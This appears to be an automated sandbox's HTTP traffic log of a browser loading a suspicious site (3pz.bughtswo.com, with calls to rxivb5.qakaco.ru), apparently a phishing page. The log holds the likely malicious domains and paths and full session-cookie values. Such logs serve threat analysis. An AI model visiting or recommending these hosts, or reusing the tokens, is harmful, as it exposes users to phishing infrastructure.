Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=ecnS.mYWfjgtSPeKE.VU0essmRbbGKBeDJcHf7fAH_Y-1742259281-1.0.1.1-v_dqiAENN0EBJmyIrLQN3cxB2AWrIxXEj5vblXMAhtsxWjNV089KkK7pBCSOsnwCePZUAfAA7PF5PO7nLUgptte98O2WqxuLSl2k.SeC2dU
Source: global traffic	HTTP traffic detected: GET /phudi$g8yzhxe HTTP/1.1Host: rxivb5.qakaco.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Origin: https://3pz.bughtswo.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://3pz.bughtswo.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /phudi$g8yzhxe HTTP/1.1Host: rxivb5.qakaco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /admi/ HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJXZ3E4cjhCTWhlRjVVNGlBdW1JYUE9PSIsInZhbHVlIjoiZDBhU0FSOG1ZSDZ3S2FkQmo1R2FUcnh0cm9NMlFHcStSVkhhckhDdGZLcWkvOUFUWGJyc2UvTHJ4REhFaGcybkdZUmIrYmx2TU9ucGY1eHE3TW5oUXJBT0V5cUFVeDl2c1NwZzJ1NjNTU00rU1NGcStmV3lUS1JiLyszdk0xaloiLCJtYWMiOiIwZjFkMjU1Zjk5MjY5NjQwYTkwYjVkOGNmOGEwNjhiNmE0OWVkMDg3MmVlMzBkYzZkYzgyYzkwMGI1YjUyZGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlR5eFlwalBoR1RoSm9FRW0zc3JibHc9PSIsInZhbHVlIjoiUXN5WnlGL3BhY2J4Vmx6cGJyZVZXZUxsK3ZHUERpcVFJaVBBUG9wdGtDSjh3UWpuS0I4d05yWUp1Zkc2WkhiaFFuUEd0SUloVXAwMEIwQ2pQb0pncHE2OXA2N0RWUEErbjFmajdNMHVZaU94eUhDeHB5L3ExVmRtcnB2Z0FUck4iLCJtYWMiOiJiNzQ2NmExOWM4ZWYwMjFjZDA4YWM0OTQxNWNkY2U0MjA0ZDMzYTQwMTZlM2QyNTUyNjFmOWYwOTZjMzQxZTRlIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /soIJXNjMdD7eIx6CmpFVmuPAf6WwWoCYwrRyag HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjJXZ3E4cjhCTWhlRjVVNGlBdW1JYUE9PSIsInZhbHVlIjoiZDBhU0FSOG1ZSDZ3S2FkQmo1R2FUcnh0cm9NMlFHcStSVkhhckhDdGZLcWkvOUFUWGJyc2UvTHJ4REhFaGcybkdZUmIrYmx2TU9ucGY1eHE3TW5oUXJBT0V5cUFVeDl2c1NwZzJ1NjNTU00rU1NGcStmV3lUS1JiLyszdk0xaloiLCJtYWMiOiIwZjFkMjU1Zjk5MjY5NjQwYTkwYjVkOGNmOGEwNjhiNmE0OWVkMDg3MmVlMzBkYzZkYzgyYzkwMGI1YjUyZGMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlR5eFlwalBoR1RoSm9FRW0zc3JibHc9PSIsInZhbHVlIjoiUXN5WnlGL3BhY2J4Vmx6cGJyZVZXZUxsK3ZHUERpcVFJaVBBUG9wdGtDSjh3UWpuS0I4d05yWUp1Zkc2WkhiaFFuUEd0SUloVXAwMEIwQ2pQb0pncHE2OXA2N0RWUEErbjFmajdNMHVZaU94eUhDeHB5L3ExVmRtcnB2Z0FUck4iLCJtYWMiOiJiNzQ2NmExOWM4ZWYwMjFjZDA4YWM0OTQxNWNkY2U0MjA0ZDMzYTQwMTZlM2QyNTUyNjFmOWYwOTZjMzQxZTRlIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjF1cUxINTdCclRBUjBUSFByOERtRnc9PSIsInZhbHVlIjoiUzY5cHRaRzZZcCtSVEE3RWVaYlBqejNuRDdrdG9VWVdZYitiUHM1bW9iVUMvTDVtVXRLTVZyZ0F0SEJhOUZhVGJjam5iMmFaaUhFU0U0N0h3akt3R3FCOFVMRnE1SXc2TC9oSmRkSWJFK1gwejk1TURNM0tOWFBIMEhmdkNycGQiLCJtYWMiOiJjMzBiYThmNGRjNDVjZDVkMjliM2M5ZDlhZGIyYzRlYTAxMjQ1ZWQ5YWZjYjY4YTljNTM4NGIzYzRiZTljZWUzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBQcFN4dVNCK0QzQzNtQzVFZVFZZ2c9PSIsInZhbHVlIjoiUVUrRDk1Si96NGN3Z294WTN0RThUZ1NFcGJZbGdwNUZSdW90bUNrd3Njb3NJRjFqa0grUTRGZmpsbVdaelM5T1pZR0d4UlJYaEtwSDVUdVVJbnU5VnVuOXpzZHRsRUhuSzI3U1Exb2k3Wm5YY1Z3eWhudHZ1bGUwa2ViZTBHNGMiLCJtYWMiOiI0MTM0NTIyYmYyODk2OGM1YWYzZGYzNjkyNmE5YmE4MDcyZGNjNzBmMDdmMWZhNTBhMDkzNWYxZDcyMzJlNjg3IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /zcjFjVbeWag4BIehEdWrtkCkgYwI2qGKbsfn5dGfq HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imlkc2srdzgxdEppd0tRZE5OL2hrTGc9PSIsInZhbHVlIjoieHYwN0xwYkVpRnJHbGVLRnNjT3phKzhaQzQyaGRYM2ZaejZ3QTVBWWY0TjlSSEJ3WjFQcDV2Y2NlSmMzTlZ4QnZjMGhQNnJxRnJLNG5Va2lxN1dkS0NEZ0J5bUhwbXlDR0EvMS9Ob0VHcStGUVBxaHNDdEhLWkdTSDVlRjNuMisiLCJtYWMiOiJiNDQ3MTdmNDMyZjRhZDYzZTliNmFmMWU3MzNhYTcxMjcwMjM0MjFhZDQyM2MzMWJiMmQwNTcxYzMxNjA1YWNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN5WTRWVDNqMXlWamFXSmppL0YxZlE9PSIsInZhbHVlIjoiLzhVQktrcGJmT2JQVDhGRUMyUEY0UkV6Y29yWVZ3VkFXTVF4a3kvY2ZLM2s1UStVTzBzNGp2ZVdDRW5nakRuMVNaemVCKzYzdmVJSlNlUG9lTTZVN29ySUlKT3BTQmN2T21yZXdsSDRCemtPUCtuY0t6cllFYUxYMTJxTWRmSUoiLCJtYWMiOiIwZWFhOTYzOGNhYjI1OGZmN2U5M2YxZDdjYmJmNzgyYjFhNzUxZTYwMDJlNjBlOGU4MzU5YzVmMDU5YzQ4ODZmIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJH HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://3pz.bughtswo.com/admi/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Imlkc2srdzgxdEppd0tRZE5OL2hrTGc9PSIsInZhbHVlIjoieHYwN0xwYkVpRnJHbGVLRnNjT3phKzhaQzQyaGRYM2ZaejZ3QTVBWWY0TjlSSEJ3WjFQcDV2Y2NlSmMzTlZ4QnZjMGhQNnJxRnJLNG5Va2lxN1dkS0NEZ0J5bUhwbXlDR0EvMS9Ob0VHcStGUVBxaHNDdEhLWkdTSDVlRjNuMisiLCJtYWMiOiJiNDQ3MTdmNDMyZjRhZDYzZTliNmFmMWU3MzNhYTcxMjcwMjM0MjFhZDQyM2MzMWJiMmQwNTcxYzMxNjA1YWNlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjN5WTRWVDNqMXlWamFXSmppL0YxZlE9PSIsInZhbHVlIjoiLzhVQktrcGJmT2JQVDhGRUMyUEY0UkV6Y29yWVZ3VkFXTVF4a3kvY2ZLM2s1UStVTzBzNGp2ZVdDRW5nakRuMVNaemVCKzYzdmVJSlNlUG9lTTZVN29ySUlKT3BTQmN2T21yZXdsSDRCemtPUCtuY0t6cllFYUxYMTJxTWRmSUoiLCJtYWMiOiIwZWFhOTYzOGNhYjI1OGZmN2U5M2YxZDdjYmJmNzgyYjFhNzUxZTYwMDJlNjBlOGU4MzU5YzVmMDU5YzQ4ODZmIiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56mQ3hNU0OeLFsBE0cdBYhj76720 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /xyYqDiOE9Wrs7igh30 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktHQUp3RFVmK1puT2dOR1JSb1g0blE9PSIsInZhbHVlIjoiRXMyMkJlN3pYRlZlWWFMRklwMUkweG51ZDNjSXNQMzR3Y0Y1UmFYeUIwV3E2eDhVd0dhWm9Cb3FndE5IcFpHTXYyNWFyZUVIcmpoaTlxWThTMjFQYkMvUTJuMitFVFYvMjZvNG5MODZkeERQME5XY21HK1dkK1BaMnlBSko2SGkiLCJtYWMiOiIzYWZmM2QwMzcwY2I1YzUzNDNiNWE3ZjU3NjFlZWNkODZiMDYxNTgzM2Q2OWVlY2U5NmM4ZjY5ZWY5NmNiMTQ1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFMTU5mQ2FLWlE0azBtS25Nakw1VGc9PSIsInZhbHVlIjoibExPVmViZ2hNMUt2M3ZhWVRSNSt1bmZIYXNiY1p5QnZLVnF2VFF3a3diOVQ4RUNGV0N1UWppbHZRSVNOUnhzcEtvcDYrSGpiOUZ6VnNrKzJmbERwSkJoTVBCSkQ0by9KSGdGT3Q1YkVwUzNzN2RGV3Y5VlRjQ0hLSFFzTHlsWm4iLCJtYWMiOiI2MWQwMTllYWRjNDUxN2U4YzllMzlkNmU1YTJiOWEzOTg1OGUwZjg4ODc3Mjc2N2FhY2M1MDRlM2NjODlmOWE0IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: 3pz.bughtswo.comConnection: keep-aliveOrigin: https://3pz.bughtswo.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://3pz.bughtswo.com/pcjgktyoyaysvmnpsseafsrkslpumfzh9xa3ziatrn40zfgb8qgw?XDZZMGXXGMZWWSUFWLHJHAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 